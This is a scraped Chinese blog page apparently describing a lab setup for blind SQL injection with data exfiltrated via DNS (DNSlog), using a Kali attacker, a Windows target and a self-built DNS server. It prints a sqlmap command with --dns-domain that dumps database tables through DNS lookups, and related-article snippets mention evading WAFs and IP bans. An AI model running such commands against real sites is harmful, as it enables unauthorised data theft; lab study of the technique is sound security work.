sql注入-sqlmap与DNSLOG的完美结合

最新推荐文章于 2025-02-13 14:27:05 发布

不会就跑路的小白

最新推荐文章于 2025-02-13 14:27:05 发布

阅读量3.2k

点赞数

文章标签： sql 安全 linux

本文链接：https://blog.csdn.net/weixin_54217950/article/details/123023360

版权

sqlmap结合dnslog

实验环境：

这里使用三台虚拟机，在公网是一样的效果
1.kali（使用sqlmap）      ip：192.168.31.40
2.windows10（靶机）       ip： 192.168.31.33
3.windows 2008 R2 （ 需要设置dns服务器）ip ：192.168.31.35

DNS服务器配置

dns服务器配置(ip为服务器所在主机的ip)
在这里插入图片描述

dns转换器配置（ip为kail的ip）

在这里插入图片描述

设置靶机的dns地址

IP为配置的dns地址
在这里插入图片描述

在靶机ping服务器，在kail上发现可以监听到
在这里插入图片描述

开始sqlmap结合dnslog进行注入

命令格式：sqlmap -u "http://xx.xx.xx.xx/index.php?id=1" --technique=T --dns-domain "oupeng.top" -D security --tables

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

不会就跑路的小白

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

sql 注入 Dnslog

飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘

04-12

448

通常我们面对SQL注入过程中没有回显的情况下，只能通过盲注的方式来判断是否存在SQL注入，但是，使用盲注，手工测试是需要花费大量的时间的，可能会想到使用sqlmap直接去跑出数据，但在实际测试中，使用sqlmap跑盲注，有很大的几率，网站把ip给封掉，这就影响了我们的测试进度，也许你也可以使用代理池。。。

sqlmap+dnslog注入复现

qq_50646296的博客

08-07

1066

2.准备两台虚拟机，一台为Kali（作为攻击机）另一台使用Windows server2008 R2（作为DNS服务器），使用本地物理机作为肉机。编辑本地肉机的dns设置，改为手动，首选DNS写windows server2008 的IP地址。查看secure_file_priv 是否为空值，如果是NULL，需要将其改为空。2 不存在，则在[mysqld]下，新增secure_file_priv=""。然后添加A记录，一条ns，作为域dns服务器，一条*匹配所有子域。配置DNS服务器ip信息和dns信息。.

参与评论您还未登录，请先登录后发表或查看评论

SQLmap 结合本地dnslog实现注入

lin152235的博客

08-05

337

命令格式：sqlmap -u "http://xx.xx.xx.xx/index.php?2.1添加DNS服务器及正向查找文件添加记录。在kali看到了数据包证明成功。2.2在监视中对测试类型打钩。ip为kali 的ip。2.3添加条件转发器。

sqlmap+dnslog外带数据

m0_52813136的博客

08-04

444

sqlmap dnslog

dnslog+sqlmap外带数据

最新发布

2302_78449782的博客

02-13

395

sqlmap+DNSlog 外带参数 –dns-domain参数注入–dns-domain参数为dnslog平台的域名（我们也可以使用本地）

sqlmap结合dnslog外带注入

newlife1441的博客

08-05

743

目录📓前言📓操作步骤1.win11中下载小皮搭建sqli-labs靶场并查看win11数据库中的文件读取配置2.环境准备2.1Windows server2008 2.1.1搭建dns服务器2.2测试2.2.1设置靶机的网络的dns为server20082.2.2在win11靶机ping一下server2008中创建的域名并打开kali查看 2.2.3server2008中创建转发器2.2.4测试转发器的域名是否可以ping通并查看kali中接收情况2.3开始sqlmap使用dnslog外带注入2.3...

sqlmap结合dnslog快速注入

weixin_67259816的博客

05-22

819

该文章记录了搭建dns服务器，和使用sqlmap结合dnslog快速注入数据

sqlmap使用_使用sqlmap结合dnslog快速注入

weixin_39962675的博客

12-09

496

0x01 起因实际项目中遇到一个oracle延时注入，需要获取数据，几十个库几百张表，等找到关键数据不知道要到哪天.测试支持带外请求于是想用使用sqlmap利用DNS进行OOB注入0x02 阿里云主机与DNS解析配置1.首先购买一个域名并且进行备案，然后还需要一台vps2.配置DNS解析创建DNS服务器ns1.cwkiller.top-->vps ip ns2.cwkiller.t...

26-5 SQL 注入攻击 - 利用dnslog带回回显信息范例

2301_76268112的博客

05-15

1102

别在网上瞎学了，我最近也做了一些资源的更新，只要你是我的粉丝，这期福利你都可拿走。我先来介绍一下这些东西怎么用，文末抱走。这是我花了几天的时间去把Python所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。最近我才对这些路线做了一下新的更新，知识体系更全面了。

sqlmap结合dnslog注入

whojoe的博客

05-25

2357

sqlmap结合dnslog注入环境搭建1.phpstudy2.注入点3.配置mysql4.在线doslog网站5.sqlmap结合dnslog安装dns服务器添加转发（关键）复现手工注入sqlmap的--dns-domain参数注入参考文章环境搭建 1.phpstudy 去官网下载安装 2.注入点 test.php <?php error_reporting(0); $link = mysqli_connect('localhost','root','root'); mysqli_set_char

sqlmap + dnslog外带数据：

CYLK1987310466的博客

08-06

1139

sqlmap dnslog外带数据

sqlmap直接嗦 dnslog注入 sqllibs第8关

helloKittywz的博客

06-05

582

工具就是这样来操作，跟上我们要的dnslog的参数，这样就可以了。我们不能直接进行sqlmap盲注，这样容易被对方给封ip，所以我们前面要进行一些手工注入，我们来看看手工注入。但是我们要使用dnsllog注入的要求就比较的严格了，我们要对文件有。经过我的判断，这点是字符，然后闭合的方式是‘来进行闭合的下面是正常的回显。这点也就是判断出来了注入点，然后就直接进行爆后面的数据，然后我们在来爆到数据库。我们是用了dns解析的时候会留下记录，这时候就可以看见我们想要的内容。

SQL注入——DNSLOG注入

qq_52263650的博客

11-17

852

SQL注入——DNSlog注入

DNSLog注入及SQLmap工具使用

2301_80034711的博客

03-18

1392

DNSLog就是储存在DNS上的域名相关的信息，它可以记录我们对域名或者IP的访问信息，类似一个日志文件。比如说现在有一个xxx.aaa.com的域名（从右到左分别为顶级域名、二级域名、三级域名），将其域名设置对应的ip1.1.1.1我们向dns服务器发起aaa.com的解析请求时，DNSlog就会记录下对aaa.com的解析，那么解析值就为1.1.1.1，这样被记录下来的过程就是DNSLog。Sqlmap是一个使用python语言开发的开源的渗透测试工具，可以利用SQL注入漏洞，获取数据库服务器的权限。

sqlmap --dns-domain模拟实践

weixin_33724659的博客

10-13

722

因为看到乌云的这一篇文章http://drop.xbclub.org/static/drops/tips-5283.html 里面的提到的用sqlmap 的--dns-domain 进行dns 注入，所以想本地模拟一个环境进行测试。首先dns注入 mysql> show variables like '%skip%'; +------------------------+---...

一键启动+AWVS+Sqlmap+BurpSutie+Xray多级代理联合挖洞

tangshuangsss的专栏

07-19

2157

点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介最近在研究将多个工具联合在一起进行漏洞挖掘，提高挖洞效率，如AWVS+Sqlmap+BurpSutie+Xray进行联合，这样在使用web漏洞扫描的同时其他的几种工具也可以同步进行自动化漏洞挖掘。实战工具自行下载安装哈，可以直接找最新版本的：AWVS：web漏洞扫描工具Sqlmap：sql注...

SQL注入(二次,DNSlog,堆叠等注入)

qi_SJQ_的博客

11-11

1201

加解密：最常见的就是base64编码，url编码等等，这些都得熟悉。比如：cookie处加解密，需要自己去还原并相应地加密payload；二次注入：在黑盒测试以及工具中几乎发现不了，拿到源码后代码审计的话才可以发现，因为根本不知到第一次插入什么数据才可以导致二次调用时成功注入。可以在Less-24实战：修改密码页面sql源码： UPDATE users SET PASSWORD='$pass' where username='$username' and password='$...

【sql注入】sqlmap+DNSlog外带数据注入复现

C_LCH_2000的博客

08-19

2338

DNSlog注入 dnslog注入原理通过子查询，将内容拼接到域名内，查询相应的dns解析记录，来获取我们想要的数据利用场景在sql注入为布尔盲注、时间盲注时，如果遇到大量的数据，注入的效率将十分低下且耗时，用sqlmap还容易被waf拦截，IP被ban，这种情况就可用利用内置文件读取函数 load_file()来完成 DNSlog注入

如何结合UNC路径和OOB技术，使用sqlmap进行盲注攻击并获取数据？

10-31

然后，通过精心构造的SQL注入载荷和OOB技术，触发目标数据库的DNS查询，使得查询内容包含了我们需要获取的数据。这种攻击方法虽然复杂，但效率极高，能够实现所谓的'音速盲注'。因此，掌握这一技术对于网络安全...